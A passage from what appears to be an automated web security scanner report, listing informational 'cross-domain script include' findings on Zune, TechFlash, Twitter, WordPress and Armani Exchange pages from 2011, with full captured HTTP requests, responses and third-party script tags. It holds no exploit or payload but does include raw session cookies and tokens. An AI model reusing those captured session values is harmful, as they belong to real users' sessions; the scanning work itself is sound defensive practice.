<param name="initParams" value="'+p+'" />');m.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration:none;display:block;background:#fff;width:500px;height:292px;text-align:center;margin:0 auto;">');m.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style:none;margin-top:39px;"/>
...[SNIP]...
';var d=this.getParams();for(var a in d){b+=[a]+'="'+d[a]+'" '}var c=this.getVariablePairs().join("&");if(c.length>0){b+='flashvars="'+c+'"'}b+="/>"}else{this.addVariable("MMplayerType","ActiveX");b='<object codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,115,0" id="'+this.getAttribute("id")+'" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+this.getAttribute("width")+'" height="'+this.getAttribute("height")+'" style="'+this.getAttribute("style")+'">';b+='<param name="movie" value="'+this.getAttribute("swf")+'" />
...[SNIP]...
nitParams" name="initParams" value="autostart=false,muted=False,captions=True,markers=True,isexplicitandischild='+isExplicitAndIsChild+",signinrequired="+signinRequired+",m="+videoPath+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 500px; height: 292px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 39px;"/>
...[SNIP]...
<param name="initParams" name="initParams" value="'+d+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 660px; height: 400px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 93px;"/>
...[SNIP]...
<br/>'+LocStr.lxUtilResources.PodcastReportAConcernFooterText+'<a target="_blank" href="http://www.microsoft.com/info/cpyrtinfrg.htm">http://www.microsoft.com/info/cpyrtinfrg.htm</a>
...[SNIP]...
14. Cross-domain script include  previous  next
There are 51 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

14.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web HTTP/1.1
Host: social.zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940283855:ss=1309940283855; lastCulture=en-US

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: ec73cbe3-4917-444b-8d6c-93f60f1a09fb,848807
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Content-Length: 30161
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 11:19:49 GMT
Date: Wed, 06 Jul 2011 11:19:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
</span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
14.2. http://social.zune.net/TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: f0ad3f48-2b8a-4108-b988-3f6c8b171e02,892914
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S501
X-Powered-By: ASP.NET
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 14:06:35 GMT
Date: Wed, 06 Jul 2011 14:06:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
</span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
14.3. http://social.zune.net/album/F59FD406-0100-11DB-89CA-0019B92A3933  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /album/F59FD406-0100-11DB-89CA-0019B92A3933

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /album/F59FD406-0100-11DB-89CA-0019B92A3933 HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: f0ad3f48-2b8a-4108-b988-3f6c8b171e02,892904
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S501
X-Powered-By: ASP.NET
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 14:06:33 GMT
Date: Wed, 06 Jul 2011 14:06:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
</span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
14.4. http://techflash.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techflash.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:33 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<link href="http://www2.bizjournals.com/css/techflash.css?v=18" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-impromptu.1.3.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="TechFlash" href="http://feeds.feedburner.com/TechFlash">
<script src="http://www2.bizjournals.com/js/tabs.js?v=10" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script src="http://www2.bizjournals.com/js/jquery.form.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/omniture.js?v=14"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=1) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=t1;vs=commercial;sz=728x90;tile=1;kw=seattle;dcopt=ist;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="//www.google.com/jsapi"></script>
...[SNIP]...
</h4>

<script type="text/javascript" src="http://www.masshightech.com/tech-news-widget/widget.js"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=2) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=c1;vs=commercial;sz=300x250;tile=2;kw=seattle;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=3) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=but1;vs=commercial;sz=125x125;tile=3;kw=seattle;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=4) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=but2;vs=commercial;sz=125x125;tile=4;kw=seattle;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
<div id="footer">
<script src="http://content.dl-rms.com/rms/mother/5261/nodetag.js"></script>
...[SNIP]...
<!-- Start Quantcast tag --><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Revenue Science API --><script src="http://js.revsci.net/gateway/gw.js?csid=K08784"></script>
...[SNIP]...
14.5. http://techflash.com/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techflash.com
Path:   /about.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about.html HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-399196261-1309960828609; s_pers=%20s_vnum%3D1312552828670%2526vn%253D1%7C1312552828670%3B%20s_lv%3D1309960845575%7C1404568845575%3B%20s_lv_s%3DFirst%2520Visit%7C1309962645575%3B%20s_dslv%3DFirst%2520Visit%7C1310565645579%3B%20s_p12%3DFirst%2520Visit%7C1310565645581%3B%20s_invisit%3Dtrue%7C1309962645583%3B; s_sess=%20s_ria%3Dflash%252010%257Csilverlight%2520not%2520detected%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:12 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<link href="http://www2.bizjournals.com/css/techflash.css?v=18" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-impromptu.1.3.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="TechFlash" href="http://feeds.feedburner.com/TechFlash">
<script src="http://www2.bizjournals.com/js/tabs.js?v=10" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script src="http://www2.bizjournals.com/js/jquery.form.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/omniture.js?v=14"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=1) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=t1;sz=728x90;tile=1;kw=seattle;dcopt=ist;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="//www.google.com/jsapi"></script>
...[SNIP]...
</h4>

<script type="text/javascript" src="http://www.masshightech.com/tech-news-widget/widget.js"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=2) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=c1;sz=300x250;tile=2;kw=seattle;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=3) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=but1;sz=125x125;tile=3;kw=seattle;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=4) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=but2;sz=125x125;tile=4;kw=seattle;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
<div id="footer">
<script src="http://content.dl-rms.com/rms/mother/5261/nodetag.js"></script>
...[SNIP]...
<!-- Start Quantcast tag --><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Revenue Science API --><script src="http://js.revsci.net/gateway/gw.js?csid=K08784"></script>
...[SNIP]...
14.6. http://twitter.com/account/resend_password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/resend_password

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951241-12181-54756
ETag: "3a31a002396e5b8f5874b4d7f47a249e"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:41 GMT
X-Runtime: 0.02223
Content-Type: text/html; charset=utf-8
Content-Length: 10499
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 953b6510a72c9af390c83823f847aaa0b9be8818
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO&lang=en"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1309899422/javascripts/twitter.js?1309893581" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1309899422/javascripts/lib/jquery.tipsy.min.js?1309893581" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1309899422/javascripts/lib/gears_init.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1309899422/javascripts/lib/mustache.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1309899422/javascripts/geov1.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1309899422/javascripts/api.js?1309893581" type="text/javascript"></script>
...[SNIP]...
14.7. http://twitter.com/intent/session  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
</script>

<script src="http://a1.twimg.com/a/1309899422/javascripts/loadrunner.js" data-main="tfw/intents/main" data-path="http://a1.twimg.com/a/1309899422/javascripts/modules" type="text/javascript"></script>
...[SNIP]...
14.8. https://wordpress.com/wp-login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
14.9. http://www.armaniexchange.com/category/womens/sunglasses.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /category/womens/sunglasses.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/womens/sunglasses.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:28 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:28 GMT
Set-Cookie: JSESSIONID=b4cv-ltssK9foaMX-d; path=/
Content-Length: 174474


        <script language="JavaScript">
// Disable edit cell tab.
parent.editCell.cl
...[SNIP]...
<link
href="http://t.p.mybuys.com/css/mbstyles.css"
type="text/css"
rel="stylesheet"
id="mybuysstyles">
<script
type="text/javascript"
src="http://t.p.mybuys.com/js/mybuys3.js">
</script>
<script
type="text/javascript"
src="http://t.p.mybuys.com/clients/ARMANIEXCHANGE/js/setup.js">
</script>
...[SNIP]...
14.10. http://www.armaniexchange.com/storelocator.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /storelocator.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /storelocator.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:29 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:29 GMT
Set-Cookie: JSESSIONID=cnJmPlEr-4b-hiMX-d; path=/
Content-Length: 52997


<script language="JavaScript">
// Disable edit cell tab.
parent.editCell.className = "tab-button-dis";

function saveForm() {
location.replace
...[SNIP]...
<link
href="http://t.p.mybuys.com/css/mbstyles.css"
type="text/css"
rel="stylesheet"
id="mybuysstyles">
<script
type="text/javascript"
src="http://t.p.mybuys.com/js/mybuys3.js">
</script>
<script
type="text/javascript"
src="http://t.p.mybuys.com/clients/ARMANIEXCHANGE/js/setup.js">
</script>
...[SNIP]...
14.11. http://www.beautyoftheweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyoftheweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Wed, 06 Jul 2011 15:34:55 GMT

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=181
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 15:41:55 GMT
Last-Modified: Wed, 06 Jul 2011 15:36:55 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT
Content-Length: 13816


<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8" />
   <title>Download Internet Explorer 9 - Beauty of the Web</title>
<meta http
...[SNIP]...
</script>
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
</footer>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=7.0&mkt=sr-La"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
14.12. http://www.beautyoftheweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyoftheweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=135
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 15:41:06 GMT
Last-Modified: Wed, 06 Jul 2011 15:36:06 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:51 GMT
Content-Length: 13816


<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8" />
   <title>Download Internet Explorer 9 - Beauty of the Web</title>
<meta http
...[SNIP]...
</script>
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
</footer>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=7.0&mkt=en-US"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
14.13. http://www.beautyoftheweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
